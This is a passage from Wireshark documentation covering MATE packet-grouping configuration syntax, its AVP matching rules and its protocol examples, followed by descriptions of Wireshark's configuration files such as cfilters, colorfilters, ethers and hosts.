Pdu q931 Proto q931 Transport ip { Extract addr From ip.addr; Extract call_ref From q931.call_ref; Extract q931_msg From q931.message_type; Extract calling From q931.calling_party_number.digits; Extract called From q931.called_party_number.digits; Extract guid From h225.guid; Extract q931_cause From q931.cause_value; }; Gop q931_leg On q931 Match (addr, addr, call_ref) { Start (q931_msg=5); Stop (q931_msg=90); Extra (calling, called, guid, q931_cause); }; Pdu ras Proto h225.RasMessage Transport ip { Extract addr From ip.addr; Extract ras_sn From h225.requestSeqNum; Extract ras_msg From h225.RasMessage; Extract guid From h225.guid; }; Gop ras_req On ras Match (addr, addr, ras_sn) { Start (ras_msg {0|3|6|9|12|15|18|21|26|30} ); Stop (ras_msg {1|2|4|5|7|8|10|11|13|14|16|17|19|20|22|24|27|28|29|31}); Extra (guid); }; Gog call { Member ras_req (guid); Member q931_leg (guid); Extra (called,calling,q931_cause); }; Done; with this we can: With this example, all the components of an MMS send or receive will be tied into a single Gog. Note that this example uses the Payload clause because MMS delivery uses MMSE over either HTTP or WSP. As it is not possible to relate the retrieve request to a response by means of MMSE only (the request is just an HTTP GET without any MMSE), a Gop is made of HTTP Pdus but MMSE data needs to be extracted from the bodies. ## WARNING: this example has been blindly translated from the "old" MATE syntax ## and it has been verified that Wireshark accepts it. However, it has not been ## tested against any capture file due to lack of the latter.
Transform rm_client_from_http_resp1 { Match (http_rq); Match Every (addr) Insert (not_rq); }; Transform rm_client_from_http_resp2 { Match (not_rq,ue) Replace (); }; Pdu mmse_over_http_pdu Proto http Transport tcp/ip { Payload mmse; Extract addr From ip.addr; Extract port From tcp.port; Extract http_rq From http.request; Extract content From http.content_type; Extract resp From http.response.code; Extract method From http.request.method; Extract host From http.host; Extract trx From mmse.transaction_id; Extract msg_type From mmse.message_type; Extract notify_status From mmse.status; Extract send_status From mmse.response_status; Transform rm_client_from_http_resp1, rm_client_from_http_resp2; }; Gop mmse_over_http On mmse_over_http_pdu Match (addr, addr, port, port) { Start (http_rq); Stop (http_rs); Extra (host, ue, resp, notify_status, send_status, trx); }; Transform mms_start { Match Loose() Insert (mms_start); }; Pdu mmse_over_wsp_pdu Proto wsp Transport ip { Payload mmse; Extract trx From mmse.transaction_id; Extract msg_type From mmse.message_type; Extract notify_status From mmse.status; Extract send_status From mmse.response_status; Transform mms_start; }; Gop mmse_over_wsp On mmse_over_wsp_pdu Match (trx) { Start (mms_start); Stop (never); Extra (ue, notify_status, send_status); }; Gog mms { Member mmse_over_http (trx); Member mmse_over_wsp (trx); Extra (ue, notify_status, send_status, resp, host, trx); Expiration 60.0; }; The MATE library will contain GoP definitions for several protocols. Library protocols are included in your MATE config using Action=Include; Lib=proto_name;. For every protocol with a library entry, we’ll find defined what is needed from the PDU to create a GoP for that protocol, eventually any criteria, and the very essential GoP definition (i.e. GopDef, GopStart and GopStop). It will create a GoP for every TCP session. If it is used, it should be the last one in the list.
Also, every other proto on top of TCP should be declared with Stop=TRUE; so that a TCP PDU is not created where one is already going on.

Action=PduDef; Name=tcp_pdu; Proto=tcp; Transport=ip; addr=ip.addr; port=tcp.port; tcp_start=tcp.flags.syn; tcp_stop=tcp.flags.fin; tcp_stop=tcp.flags.reset;
Action=GopDef; Name=tcp_session; On=tcp_pdu; addr; addr; port; port;
Action=GopStart; For=tcp_session; tcp_start=1;
Action=GopStop; For=tcp_session; tcp_stop=1;

The following will create a GoP containing every request and its response (possibly retransmissions too).

Action=PduDef; Name=dns_pdu; Proto=dns; Transport=udp/ip; addr=ip.addr; port=udp.port; dns_id=dns.id; dns_rsp=dns.flags.response;
Action=GopDef; Name=dns_req; On=dns_pdu; addr; addr; port!53; dns_id;
Action=GopStart; For=dns_req; dns_rsp=0;
Action=GopStop; For=dns_req; dns_rsp=1;

A Gop for every transaction:

Action=PduDef; Name=radius_pdu; Proto=radius; Transport=udp/ip; addr=ip.addr; port=udp.port; radius_id=radius.id; radius_code=radius.code;
Action=GopDef; Name=radius_req; On=radius_pdu; radius_id; addr; addr; port; port;
Action=GopStart; For=radius_req; radius_code|1|4|7;
Action=GopStop; For=radius_req; radius_code|2|3|5|8|9;

Action=PduDef; Name=rtsp_pdu; Proto=rtsp; Transport=tcp/ip; addr=ip.addr; port=tcp.port; rtsp_method=rtsp.method;
Action=PduExtra; For=rtsp_pdu; rtsp_ses=rtsp.session; rtsp_url=rtsp.url;
Action=GopDef; Name=rtsp_ses; On=rtsp_pdu; addr; addr; port; port;
Action=GopStart; For=rtsp_ses; rtsp_method=DESCRIBE;
Action=GopStop; For=rtsp_ses; rtsp_method=TEARDOWN;
Action=GopExtra; For=rtsp_ses; rtsp_ses; rtsp_url;

Most protocol definitions here will create one Gop for every Call Leg unless stated otherwise.
Action=PduDef; Name=isup_pdu; Proto=isup; Transport=mtp3; mtp3pc=mtp3.dpc; mtp3pc=mtp3.opc; cic=isup.cic; isup_msg=isup.message_type;
Action=GopDef; Name=isup_leg; On=isup_pdu; ShowPduTree=TRUE; mtp3pc; mtp3pc; cic;
Action=GopStart; For=isup_leg; isup_msg=1;
Action=GopStop; For=isup_leg; isup_msg=16;

Action=PduDef; Name=q931_pdu; Proto=q931; Stop=TRUE; Transport=tcp/ip; addr=ip.addr; call_ref=q931.call_ref; q931_msg=q931.message_type;
Action=GopDef; Name=q931_leg; On=q931_pdu; addr; addr; call_ref;
Action=GopStart; For=q931_leg; q931_msg=5;
Action=GopStop; For=q931_leg; q931_msg=90;

Action=PduDef; Name=ras_pdu; Proto=h225.RasMessage; Transport=udp/ip; addr=ip.addr; ras_sn=h225.RequestSeqNum; ras_msg=h225.RasMessage;
Action=PduExtra; For=ras_pdu; guid=h225.guid;
Action=GopDef; Name=ras_leg; On=ras_pdu; addr; addr; ras_sn;
Action=GopStart; For=ras_leg; ras_msg|0|3|6|9|12|15|18|21|26|30;
Action=GopStop; For=ras_leg; ras_msg|1|2|4|5|7|8|10|11|13|14|16|17|19|20|22|24|27|28|29|31;
Action=GopExtra; For=ras_leg; guid;

Action=PduDef; Name=sip_pdu; Proto=sip; Transport=tcp/ip; addr=ip.addr; port=tcp.port; sip_method=sip.Method; sip_callid=sip.Call-ID; calling=sdp.owner.username;
Action=GopDef; Name=sip_leg; On=sip_pdu; addr; addr; port; port;
Action=GopStart; For=sip_leg; sip_method=INVITE;
Action=GopStop; For=sip_leg; sip_method=BYE;

This will create a Gop out of every transaction.
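For comparison, the old-syntax SIP definition above would look roughly as follows in the current MATE syntax (a hand translation for illustration, not taken from the MATE library and not tested against a capture file):

```
Pdu sip_pdu Proto sip Transport tcp/ip {
	Extract addr From ip.addr;
	Extract port From tcp.port;
	Extract sip_method From sip.Method;
	Extract sip_callid From sip.Call-ID;
	Extract calling From sdp.owner.username;
};

Gop sip_leg On sip_pdu Match (addr, addr, port, port) {
	Start (sip_method=INVITE);
	Stop (sip_method=BYE);
};
```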
Action=PduDef; Name=mgc_pdu; Proto=megaco; Transport=ip; addr=ip.addr; megaco_ctx=megaco.context; megaco_trx=megaco.transid; megaco_msg=megaco.transaction; term=megaco.termid;
Action=GopDef; Name=mgc_tr; On=mgc_pdu; addr; addr; megaco_trx;
Action=GopStart; For=mgc_tr; megaco_msg|Request|Notify;
Action=GopStop; For=mgc_tr; megaco_msg=Reply;
Action=GopExtra; For=mgc_tr; term^DS1; megaco_ctx!Choose one;

To "tie" them to your call’s GoG use:

Action=GogKey; Name=your_call; On=mgc_tr; addr!mgc_addr; megaco_ctx;

MATE uses AVPs for almost everything: to keep the data it has extracted from the frames' trees as well as to keep the elements of the configuration. These "pairs" (actually tuples) are made of a name, a value and, in the case of configuration AVPs, an operator. Names and values are strings. AVPs with operators other than '=' are used only in the configuration, where they serve to match AVPs of Pdus, GoPs and GoGs in the analysis phase.

The name is a string used to refer to a class of AVPs. Two attributes won’t match unless their names are identical. Capitalized names are reserved for keywords (you can use them for your elements if you want, but it is not advisable). MATE attribute names can be used in Wireshark’s display filters in the same way as the names of protocol fields provided by dissectors, but they are not just references to (or aliases of) protocol fields.

The value is a string. It is either set in the configuration (for configuration AVPs) or by MATE while extracting interesting fields from a dissection tree and/or manipulating them later. The values extracted from fields use the same representation as they do in filter strings.

Currently only match operators are defined (there are plans to (re)add transform attributes, but some internal issues have to be solved before that).
The match operations are always performed between two operands: the value of an AVP stated in the configuration and the value of an AVP (or several AVPs with the same name) extracted from packet data (called "data AVPs"). It is not possible to match data AVPs to each other.

The defined match operators are:

= (equal): matches if the values of the configuration AVP and the data AVP are equal.

! (not equal): matches if the value strings of the two AVPs are not equal.

{} (one of): matches if the data AVP value is equal to one of the values listed in the "one of" AVP.

^ (starts with): matches if the first characters of the data AVP value are identical to the configuration AVP value.

$ (ends with): matches if the last bytes of the data AVP value are equal to the configuration AVP value.

~ (contains): matches if the data AVP value contains a string identical to the configuration AVP value.

< (lower than): matches if the data AVP value is semantically lower than the configuration AVP value. BUGS: It should check whether the values are numbers and compare them numerically.

> (higher than): matches if the data AVP value is semantically higher than the configuration AVP value. Examples:

attrib=bcd matches attrib>abc
attrib=3 matches attrib>2, but beware: attrib=9 does not match attrib>10
attrib=abc does not match attrib>bcd
attrib=abc does not match attrib>abc

BUGS: It should check whether the values are numbers and compare them numerically.

Pdus, GoPs and GoGs use an AVPL to contain the tracing information. An AVPL is an unsorted set of AVPs that can be matched against other AVPLs. There are three types of match operations that can be performed between AVPLs. The Pdu’s/GoP’s/GoG’s AVPL will always be one of the operands; the AVPL operator (match type) and the second operand AVPL will always come from the configuration. Note that a different AVP match operator may be specified for each AVP in the configuration AVPL.
An AVPL match operation returns a result AVPL. In Transforms, the result AVPL may be replaced by another AVPL. The replacement means that the existing data AVPs are dropped and the replacement AVPL from the configuration is Merged to the data AVPL of the Pdu/GoP/GoG.

A loose match between AVPLs succeeds if at least one of the data AVPs matches at least one of the configuration AVPs. Its result AVPL contains all the data AVPs that matched. Loose matches are used in Extra operations: against the Pdu’s AVPL to merge the result into the Gop’s AVPL, and against the Gop’s AVPL to merge the result into the Gog’s AVPL. They may also be used in Criteria and Transforms.

Loose Match Examples:

(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Loose (attr_a?, attr_c?) ⇒ (attr_a=aaa, attr_c=xxx)
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Loose (attr_a?, attr_c=ccc) ⇒ (attr_a=aaa)
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Loose (attr_a=xxx, attr_c=ccc) ⇒ No Match!

An "every" match between AVPLs succeeds if none of the configuration’s AVPs that have a counterpart in the data AVPL fails to match. Its result AVPL contains all the data AVPs that matched. These may only be used in Criteria and Transforms.

"Every" Match Examples:

(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a?, attr_c?) ⇒ (attr_a=aaa, attr_c=xxx)
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a?, attr_c?, attr_d=ddd) ⇒ (attr_a=aaa, attr_c=xxx)
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a?, attr_c=ccc) ⇒ No Match!
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Every (attr_a=xxx, attr_c=ccc) ⇒ No Match!

A Strict match between AVPLs succeeds if and only if every AVP in the configuration AVPL has at least one counterpart in the data AVPL and none of the AVP matches fails. The result AVPL contains all the data AVPs that matched. These are used between Gop keys (key AVPLs) and Pdu AVPLs. They may also be used in Criteria and Transforms.
Strict Match Examples:

(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Strict (attr_a?, attr_c=xxx) ⇒ (attr_a=aaa, attr_c=xxx)
(attr_a=aaa, attr_b=bbb, attr_c=xxx, attr_c=yyy) Match Strict (attr_a?, attr_c?) ⇒ (attr_a=aaa, attr_c=xxx, attr_c=yyy)
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Strict (attr_a?, attr_c=ccc) ⇒ No Match!
(attr_a=aaa, attr_b=bbb, attr_c=xxx) Match Strict (attr_a?, attr_c?, attr_d?) ⇒ No Match!

An AVPL may be merged into another one. That would add to the latter every AVP from the former that does not already exist there. This operation is performed, for example, when the AVPs matched by an Extra clause are merged into a Gop’s or Gog’s AVPL.

Merge Examples:

(attr_a=aaa, attr_b=bbb) Merge (attr_a=aaa, attr_c=xxx); former becomes (attr_a=aaa, attr_b=bbb, attr_c=xxx)
(attr_a=aaa, attr_b=bbb) Merge (attr_a=aaa, attr_a=xxx); former becomes (attr_a=aaa, attr_a=xxx, attr_b=bbb)
(attr_a=aaa, attr_b=bbb) Merge (attr_c=xxx, attr_d=ddd); former becomes (attr_a=aaa, attr_b=bbb, attr_c=xxx, attr_d=ddd)

A Transform is a sequence of Match rules optionally followed by an instruction on how to modify the match result using an additional AVPL. Such a modification may be an Insert (merge) or a Replace. The syntax is as follows:

Transform name {
	Match [Strict|Every|Loose] match_avpl [[Insert|Replace] modify_avpl] ; // may occur multiple times, at least once
};

For examples of Transforms, check the Manual page.

The list of Match rules inside a Transform is processed top to bottom; the processing ends as soon as either a Match rule succeeds or all have been tried in vain.

Transforms can be used as helpers to manipulate an item’s AVPL before the item is processed further. An item declaration may contain a Transform clause indicating a list of previously declared Transforms. Regardless of whether the individual transforms succeed or fail, the list is always executed completely and in the order given, i.e. left to right. In a MATE configuration file, a Transform must be declared before declaring any item which uses it.
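Since the Manual-page examples are not reproduced here, the following sketch illustrates the rule ordering (the dns_kind attribute is invented for illustration; the Pdu reuses field names from the DNS example elsewhere in this chapter):

```
Transform label_dns_kind {
	Match Strict (dns_rsp=0) Insert (dns_kind=query);    // the first rule that matches wins,
	Match Strict (dns_rsp=1) Insert (dns_kind=response); // the remaining rules are not tried
};

Pdu dns_pdu Proto dns Transport udp/ip {
	Extract addr From ip.addr;
	Extract port From udp.port;
	Extract dns_id From dns.id;
	Extract dns_rsp From dns.flags.response;
	Transform label_dns_kind;
};
```

After extraction, each dns_pdu carries an extra dns_kind AVP telling whether it was a query or a response.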
The following configuration AVPLs deal with Pdu creation and data extraction. In each frame of the capture, MATE will look for source proto_name PDUs in the order in which the declarations appear in its configuration and will create Pdus of every type it can from that frame, unless specifically instructed that some Pdu type is the last one to be looked for in the frame. If told so for a given type, MATE will extract all Pdus of that type and the previously declared types it finds in the frame, but not those declared later.

The complete declaration of a Pdu looks as below; the mandatory order of the various clauses is as shown.

Pdu name Proto proto_name Transport proto1[/proto2[/proto3[/...]]] {
	Payload proto; //optional, no default value
	Extract attribute From proto.field; //may occur multiple times, at least once
	Transform (transform1[, transform2[, ...]]); //optional
	Criteria [{Accept|Reject}] [{Strict|Every|Loose} match_avpl];
	DropUnassigned {true|false}; //optional, default=false
	DiscardPduData {true|false}; //optional, default=false
	LastExtracted {true|false}; //optional, default=false
};

The name is a mandatory attribute of a Pdu which MATE creates. However, several Pdu declarations may share the same name. In such a case, all of them are created from each source PDU matching their Proto, Transport, and Payload clauses, while the bodies of their declarations may be totally different from each other. Together with the Accept (or Reject) clauses, this feature is useful when it is necessary to build the Pdu’s AVPL from different sets of source fields depending on the contents (or mere presence) of other source fields.

Every instance of the protocol proto_name PDU in a frame will generate one Pdu with the AVPs extracted from fields that are in the proto_name's range and/or the ranges of underlying protocols specified by the Transport list. It is a mandatory attribute of a Pdu declaration.
The proto_name is the name of the protocol as used in Wireshark display filters. The Pdu’s Proto, and its Transport list of protocols separated by /, tell MATE which fields of a frame can get into the Pdu’s AVPL. In order for MATE to extract an attribute from a frame’s protocol tree, the area representing the field in the hex display of the frame must be within the area of either the Proto or its relative Transports. Transports are chosen moving backwards from the protocol area, in the order they are given.

Proto http Transport tcp/ip does what you’d expect it to - it selects the nearest tcp range that precedes the current http range, and the nearest ip range that precedes that tcp range. If there is another ip range before the nearest one (e.g. in case of IP tunneling), that one is not going to be selected. Transport tcp/ip/ip, which "logically" should select the encapsulating IP header too, doesn’t work so far.

Once we’ve selected the Proto and Transport ranges, MATE will fetch those protocol fields belonging to them whose extraction is declared using the Extract clauses for the Pdu type. The Transport list is also mandatory; if you actually don’t want to use any transport protocol, use Transport mate. (This didn’t work until 0.10.9.)

Other than the Pdu’s Proto and its Transport protocols, there is also a Payload attribute to tell MATE from which ranges of the Proto's payload to extract fields of a frame into the Pdu. In order to extract an attribute from a frame’s tree, the highlighted area of the field in the hex display must be within the area of the Proto's relative payload(s). Payloads are chosen moving forward from the protocol area, in the order they are given. Proto http Transport tcp/ip Payload mmse will select the first mmse range after the current http range. Once we’ve selected the Payload ranges, MATE will fetch those protocol fields belonging to them whose extraction is declared using the Extract clauses for the Pdu type.
Each Extract clause tells MATE which protocol field value to extract as an AVP value and what string to use as the AVP name. The protocol fields are referred to using the names used in Wireshark display filters. If there is more than one such protocol field in the frame, each instance that fulfills the criteria stated above is extracted into its own AVP. The AVP names may be chosen arbitrarily, but to be able to match values originally coming from different Pdus (e.g., a hostname from a DNS query and a hostname from an HTTP GET request) later in the analysis, identical AVP names must be assigned to them and the dissectors must provide the field values in identical format (which is not always the case).

The Transform clause specifies a list of previously declared Transforms to be performed on the Pdu’s AVPL after all protocol fields have been extracted to it. The list is always executed completely, left to right. On the contrary, the list of Match clauses inside each individual Transform is executed only until the first match succeeds.

The Criteria clause tells MATE whether to use the Pdu for analysis. It specifies a match AVPL, an AVPL match type (Strict, Every, or Loose) and the action to be performed (Accept or Reject) if the match succeeds. Once every attribute has been extracted and the transform list, if any, has been executed, and if the Criteria clause is present, the Pdu’s AVPL is matched against the match AVPL; if the match succeeds, the action specified is executed, i.e. the Pdu is accepted or rejected. The default behaviours used if the respective keywords are omitted are Strict and Accept. Accordingly, if the clause is omitted, all Pdus are accepted.

DropUnassigned: if set to TRUE, MATE will destroy the Pdu if it cannot assign it to a Gop. If set to FALSE (the default if not given), MATE will keep them.

DiscardPduData: if set to TRUE, MATE will delete the Pdu’s AVPL once it has analyzed it and eventually extracted some AVPs from it into the Gop’s AVPL.
This is useful to save memory (of which MATE uses a lot). If set to FALSE (the default if not given), MATE will keep the Pdu attributes.

A Gop declaration declares a Gop type and its prematch candidate key.

Gop name On pduname Match key {
	Start match_avpl; // optional
	Stop match_avpl; // optional
	Extra match_avpl; // optional
	Transform transform_list; // optional
	Expiration time; // optional
	IdleTimeout time; // optional
	Lifetime time; // optional
	DropUnassigned [TRUE|FALSE]; // optional
	ShowTree [NoTree|PduTree|FrameTree|BasicTree]; // optional
	ShowTimes [TRUE|FALSE]; // optional, default TRUE
};

The name is a mandatory attribute of a Gop.

On gives the name of the Pdus which this type of Gop is supposed to be grouping. It is mandatory.

Match defines which AVPs form the key part of the Gop’s AVPL (the Gop’s key AVPL or simply the Gop’s key). All Pdus matching the key AVPL of an active Gop are assigned to that Gop; a Pdu which contains the AVPs whose attribute names are listed in the Gop’s key AVPL, but which do not strictly match any active Gop’s key AVPL, will create a new Gop (unless a Start clause is given). When a Gop is created, the elements of its key AVPL are copied from the creating Pdu.

Start, if given, tells MATE what match_avpl a Pdu’s AVPL must match, in addition to matching the Gop’s key, in order to start a Gop. If not given, any Pdu whose AVPL matches the Gop’s key AVPL will act as a start for a Gop. The Pdu’s AVPs matching the match_avpl are not automatically copied into the Gop’s AVPL.

Stop, if given, tells MATE what match_avpl a Pdu’s AVPL must match, in addition to matching the Gop’s key, in order to stop a Gop. If omitted, the Gop is "auto-stopped" - that is, the Gop is marked as stopped as soon as it is created. The Pdu’s AVPs matching the match_avpl are not automatically copied into the Gop’s AVPL.

Extra, if given, tells MATE which AVPs from the Pdu’s AVPL are to be copied into the Gop’s AVPL in addition to the Gop’s key.
The Transform clause specifies a list of previously declared Transforms to be performed on the Gop’s AVPL after the AVPs from each new Pdu, specified by the key AVPL and the Extra clause’s match_avpl, have been merged into it. The list is always executed completely, left to right. On the contrary, the list of Match clauses inside each individual Transform is executed only until the first match succeeds.

Expiration: a (floating point) number of seconds after a Gop is Stopped during which further Pdus matching the Stopped Gop’s key but not the Start condition will still be assigned to that Gop. The default value of zero has an actual meaning of infinity, as it disables this timer, so all Pdus matching the Stopped Gop’s key will be assigned to that Gop unless they match the Start condition.

IdleTimeout: a (floating point) number of seconds elapsed from the last Pdu assigned to the Gop after which the Gop will be considered released. The default value of zero has an actual meaning of infinity, as it disables this timer, so the Gop won’t be released even if no Pdus arrive - unless the Lifetime timer expires.

Lifetime: a (floating point) number of seconds after the Gop Start after which the Gop will be considered released regardless of anything else. The default value of zero has an actual meaning of infinity.

DropUnassigned: whether or not a Gop that has not been assigned to any Gog should be discarded. If TRUE, the Gop is discarded right after creation. If FALSE, the default, the unassigned Gop is kept. Setting it to TRUE helps save memory and speed up filtering.

ShowTree controls the display of the Pdus subtree of the Gop.

A Gog declaration declares a Gog type and its prematch candidate key.

Gog name {
	Member gopname (key); // mandatory, at least one
	Extra match_avpl; // optional
	Transform transform_list; // optional
	Expiration time; // optional, default 2.0
	GopTree [NoTree|PduTree|FrameTree|BasicTree]; // optional
	ShowTimes [TRUE|FALSE]; // optional, default TRUE
};

The name is a mandatory attribute of a Gog.
Member defines the key AVPL for the Gog individually for each Gop type gopname. All gopname-type Gops whose key AVPL matches the corresponding key AVPL of an active Gog are assigned to that Gog; a Gop which contains the AVPs whose attribute names are listed in the Gog’s corresponding key AVPL, but which do not strictly match any active Gog’s key AVPL, will create a new Gog. When a Gog is created, the elements of its key AVPL are copied from the creating Gop. Although the key AVPLs are specified separately for each of the Member gopnames, in most cases they are identical, as the very purpose of a Gog is to group together Gops made of Pdus of different types.

Extra, if given, tells MATE which AVPs from any of the Gops' AVPLs are to be copied into the Gog’s AVPL in addition to the Gog’s key.

Expiration: a (floating point) number of seconds after all the Gops assigned to a Gog have been released during which new Gops matching any of the session keys should still be assigned to the existing Gog instead of creating a new one. Its value can range from 0.0 to infinite. Defaults to 2.0 seconds.

The Transform clause specifies a list of previously declared Transforms to be performed on the Gog’s AVPL after the AVPs from each new Gop, specified by the key AVPL and the Extra clause’s match_avpl, have been merged into it. The list is always executed completely, left to right. On the contrary, the list of Match clauses inside each individual Transform is executed only until the first match succeeds.

GopTree controls the display of the Gops subtree of the Gog.

The Settings config element is used to pass various operational parameters to MATE. The possible parameters are:

How long in seconds after all the Gops assigned to a Gog have been released new Gops matching any of the session keys should create a new Gog instead of being assigned to the previous one. Its value can range from 0.0 to infinite. Defaults to 2.0 seconds.

Whether or not the AVPL of every Pdu should be deleted after it has been processed (saves memory).
It can be either TRUE or FALSE. Defaults to TRUE. Setting it to FALSE can save you from a headache if your config does not work.

Whether Pdus should be deleted if they are not assigned to any Gop. It can be either TRUE or FALSE. Defaults to FALSE. Set it to TRUE to save memory if unassigned Pdus are useless.

Whether Gops should be deleted if they are not assigned to any session. It can be either TRUE or FALSE. Defaults to FALSE. Setting it to TRUE saves memory.

The following settings are used to debug MATE and its configuration. All levels are integers ranging from 0 (print only errors) to 9 (flood me with junk), defaulting to 0.

Debug {
	Filename "path/name"; //optional, no default value
	Level [0-9]; //optional, generic debug level
	Pdu Level [0-9]; //optional, specific debug level for Pdu handling
	Gop Level [0-9]; //optional, specific debug level for Gop handling
	Gog Level [0-9]; //optional, specific debug level for Gog handling
};

The path/name is a full path to the file to which debug output is to be written. A non-existent file will be created; an existing file will be overwritten at each opening of a capture file. If the statement is missing, debug messages are written to the console, which means they are invisible on Windows.

Level sets the level of debugging for generic debug messages.

Pdu Level sets the level of debugging for messages regarding Pdu creation.

Gop Level sets the level of debugging for messages regarding Pdu analysis (that is, how they fit into GoPs).

Gog Level sets the level of debugging for messages regarding Gop analysis (that is, how they fit into GoGs).

The Include action will include a file in the configuration.
Action=Include; {Filename=filename;|Lib=libname;}

Filename: the filename of the file to include. If it does not begin with '/', MATE will look for the file in the current path.

Lib: the name of the lib config to include. MATE will look for libname.mate in wiresharks_dir/matelib.

Wireshark provides you with additional information generated out of the plain packet data, or it may need to indicate dissection problems. Messages generated by Wireshark are usually placed in square brackets (“[]”).

These messages might appear in the packet list.

Malformed packet means that the protocol dissector can’t dissect the contents of the packet any further. There can be various reasons, such as damaged or truncated packet data, or a bug in the dissector.

These messages might appear in the packet details.

The current packet is the request of a detected request/response pair. You can directly jump to the corresponding response packet by double-clicking on the message.

To understand which information will remain available after the captured packets are saved to a capture file, it’s helpful to know a bit about the capture file contents.

Wireshark uses the pcapng file format as the default format to save captured packets. It is very flexible but other tools may not support it.

Wireshark also supports the libpcap file format. This is a much simpler format and is well established. However, it has some drawbacks: it’s not extensible and lacks some information that would be really helpful (e.g. being able to add a comment to a packet such as “the problems start here” would be really nice).

In addition to the libpcap format, Wireshark supports several different capture file formats. However, the problems described above also apply to these formats.

At the start of each libpcap capture file some basic information is stored, like a magic number to identify the libpcap file format. The most interesting information of this file start is the link layer type (Ethernet, 802.11, MPLS, etc.).
The following data is saved for each packet: the timestamp, the packet length as it was "on the wire", the captured length, and the raw packet data. A detailed description of the libpcap file format can be found at

You should also know the things that are not saved in capture files:

Name resolution information. See Section 7.9, “Name Resolution” for details. Pcapng files can optionally save name resolution information. Libpcap files can’t. Other file formats have varying levels of support.

To match the different policies for Unix-like systems and Windows, and different policies used on different Unix-like systems, the folders containing configuration files and plugins are different on different platforms. We indicate the location of the top-level folders under which configuration files and plugins are stored here, giving them placeholder names independent of their actual location, and use those names later when giving the location of the folders for configuration files and plugins.

%APPDATA% is the personal application data folder, e.g.: C:\Users\username\AppData\Roaming\Wireshark (details can be found at: Section B.5.1, “Windows profiles”).

WIRESHARK is the Wireshark program folder, e.g.: C:\Program Files\Wireshark.

$XDG_CONFIG_HOME is the folder for user-specific configuration files. It’s usually $HOME/.config, where $HOME is the user’s home folder, which is usually something such as /home/username, or /Users/username on macOS.

If you are using macOS and you are running a copy of Wireshark installed as an application bundle, APPDIR is the top-level directory of the Wireshark application bundle, which will typically be /Applications/Wireshark.app. Otherwise, INSTALLDIR is the top-level directory under which reside the subdirectories in which components of Wireshark are installed. This will typically be /usr if Wireshark is bundled with the system (for example, provided as a package with a Linux distribution) and /usr/local if, for example, you’ve built Wireshark from source and installed it.

Wireshark uses a number of configuration files while it is running.
Some of these reside in the personal configuration folder and are used to maintain information between runs of Wireshark, while some of them are maintained in system areas. The content format of the configuration files is the same on all platforms; only the folder locations differ between Windows and Unix-like systems.

This file contains all the capture filters that you have defined and saved. It consists of one or more lines, where each line has the following format:

"<filter name>" <filter string>

At program start, if there is a cfilters file in the personal configuration folder, it is read. If there isn’t a cfilters file in the personal configuration folder, then, if there is a cfilters file in the global configuration folder, it is read. When you press the Save button in the “Capture Filters” dialog box, all the current capture filters are written to the personal capture filters file.

This file contains all the color filters that you have defined and saved. It consists of one or more lines, where each line has the following format:

@<filter name>@<filter string>@[<bg RGB(16-bit)>][<fg RGB(16-bit)>]

At program start, if there is a colorfilters file in the personal configuration folder, it is read. If there isn’t a colorfilters file in the personal configuration folder, then, if there is a colorfilters file in the global configuration folder, it is read. When you press the Save button in the “Coloring Rules” dialog box, all the current color filters are written to the personal color filters file.

This file contains all the display filter buttons that you have defined and saved. It consists of one or more lines, where each line has the following format:

"TRUE/FALSE","<button label>","<filter string>","<comment string>"

where the first field is TRUE if the button is enabled (shown).

At program start, if there is a dfilter_buttons file in the personal configuration folder, it is read.
If there isn’t a dfilter_buttons file in the personal configuration folder, then, if there is a dfilter_buttons file in the global configuration folder, it is read. When you save any changes to the filter buttons, all the current display filter buttons are written to the personal display filter buttons file.

This file contains all the display filter macros that you have defined and saved. It consists of one or more lines, where each line has the following format:

"<macro name>" <filter string>

At program start, if there is a dfilter_macros file in the personal configuration folder, it is read. If there isn’t a dfilter_macros file in the personal configuration folder, then, if there is a dfilter_macros file in the global configuration folder, it is read. When you press the Save button in the "Display Filter Macros" dialog box, all the current display filter macros are written to the personal display filter macros file. More information about display filter macros is available in Section 11.8, “Display Filter Macros”.

This file contains all the display filters that you have defined and saved. It consists of one or more lines, where each line has the following format:

"<filter name>" <filter string>

At program start, if there is a dfilters file in the personal configuration folder, it is read. If there isn’t a dfilters file in the personal configuration folder, then, if there is a dfilters file in the global configuration folder, it is read. When you press the Save button in the “Display Filters” dialog box, all the current display filters are written to the personal display filters file.

Each line in this file specifies a disabled protocol name. The following are some examples:

tcp
udp

At program start, if there is a disabled_protos file in the global configuration folder, it is read first.
Then, if there is a disabled_protos file in the personal configuration folder, that is read; if there is an entry for a protocol set in both files, the setting in the personal disabled protocols file overrides the setting in the global disabled protocols file. When you press the Save button in the “Enabled Protocols” dialog box, the current set of disabled protocols is written to the personal disabled protocols file. When Wireshark is trying to translate a hardware MAC address to a name, it consults the ethers file in the personal configuration folder first. If the address is not found in that file, Wireshark consults the ethers file in the system configuration folder. This file has the same format as the /etc/ethers file on some Unix-like systems. Each line in these files consists of one hardware address and name separated by whitespace. The digits of hardware addresses are separated by colons (:), dashes (-) or periods (.). The following are some examples: ff-ff-ff-ff-ff-ff Broadcast c0-00-ff-ff-ff-ff TR_broadcast 00.2b.08.93.4b.a1 Freds_machine The settings from this file are read in when a MAC address is to be translated to a name, and never written by Wireshark. Wireshark uses the entries in the hosts files to translate IPv4 and IPv6 addresses into names. At program start, if there is a hosts file in the global configuration folder, it is read first. Then, if there is a hosts file in the personal configuration folder, that is read; if there is an entry for a given IP address in both files, the setting in the personal hosts file overrides the entry in the global hosts file. This file has the same format as the usual /etc/hosts file on Unix systems. An example is: # Comments must be prepended by the # sign! 192.168.0.1 homeserver The settings from this file are read in at program start and never written by Wireshark. When Wireshark is trying to translate an IPX network number to a name, it consults the ipxnets file in the personal configuration folder first.
